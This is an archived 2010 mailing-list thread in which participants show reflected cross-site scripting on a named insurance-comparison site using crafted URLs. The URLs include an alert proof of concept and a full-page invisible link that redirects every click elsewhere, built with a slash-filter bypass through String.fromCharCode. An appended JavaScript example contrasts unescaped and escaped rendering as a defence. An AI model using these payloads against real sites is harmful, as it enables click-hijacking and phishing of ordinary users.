[_] Friday Funny..ish

Oliver Humpage oliver at watershed.co.uk
Tue Nov 2 11:19:14 GMT 2010

On 2 Nov 2010, at 10:54, Alex Francis wrote:

> On Fri, Oct 29, 2010 at 11:00 AM, Oliver Humpage <oliver at watershed.co.uk> wrote:
>>
>> Or indeed html, e.g. http://www.bewiser.co.uk/car/type/<em> . Haven't
>> got time to make JS work (they seem to do stuff with / and %2F which
>> makes adding "</script>" or "//" hard), but should be doable.
>>
>> Oliver.
>>
>
> Not sure I should be doing this really, and a bit late, but:
> http://www.bewiser.co.uk/car/type/%3Cbody%20onload=%22alert('oops')%22%3E

Very nicely done - although it doesn't work in Safari, which appears  
to refuse to execute JS that's found in the request (nicely done  
there, Safari).

Using JS's String.fromCharCode(47) you can put slashes into JS  
strings, and so:

http://www.bewiser.co.uk/car/type/%3Ca%20style=%22height:100%25;width:100%25;z-index:9999;position:absolute;display:block;%22%20onclick=%22document.location.href=%27http:%27%2BString.fromCharCode%2847%29%2BString.fromCharCode%2847%29%2B%27google.com%27;%22%3E

works quite nicely. If the <a> can be gotten to cover more of the  
screen then an onclick would work very well, so wherever the user  
clicked (e.g. on the "Get a quote now" graphic) they'd get taken to  
your site.

Oliver.
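
A defender's view of the reflection discussed in this thread, as an added example that is not part of the original post or the site's code: a percent-decoded path segment rendered with and without HTML output encoding, plus an allow-list check on the segment. The route handling, the page markup and the function names (`typeSegment`, `renderUnsafe`, `renderSafe`, `isValidType`) are assumptions for illustration.

```javascript
// Hypothetical handler logic for a /car/type/<segment> route (assumed, not the site's code).
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the five characters that matter in HTML text and quoted-attribute contexts.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Take the last path segment and percent-decode it, as a web framework would.
function typeSegment(requestPath) {
  const raw = requestPath.split('/').pop();
  try {
    return decodeURIComponent(raw);
  } catch (e) {
    return raw; // malformed percent-encoding: keep the literal text
  }
}

// Allow-list: a vehicle type is short and made of letters, digits and hyphens only.
function isValidType(segment) {
  return /^[A-Za-z0-9-]{1,40}$/.test(segment);
}

// "Before": the decoded segment is concatenated into markup unchanged.
function renderUnsafe(requestPath) {
  return '<h1>Car insurance: ' + typeSegment(requestPath) + '</h1>';
}

// "After": the same value is HTML-encoded at the point of output.
function renderSafe(requestPath) {
  return '<h1>Car insurance: ' + escapeHtml(typeSegment(requestPath)) + '</h1>';
}

// Request path taken from the first URL quoted in the thread. It contains no
// "/" inside the segment, so filtering slashes alone does not stop the markup.
const SAMPLE_PATH = "/car/type/%3Cbody%20onload=%22alert('oops')%22%3E";

function demo() {
  console.log('unsafe :', renderUnsafe(SAMPLE_PATH));
  console.log('safe   :', renderSafe(SAMPLE_PATH));
  console.log('valid? :', isValidType(typeSegment(SAMPLE_PATH)));
}
demo();
```

Rejecting segments that fail `isValidType` (for instance with a 404) and encoding on output are complementary: the first narrows what is accepted, the second keeps anything that is reflected inert.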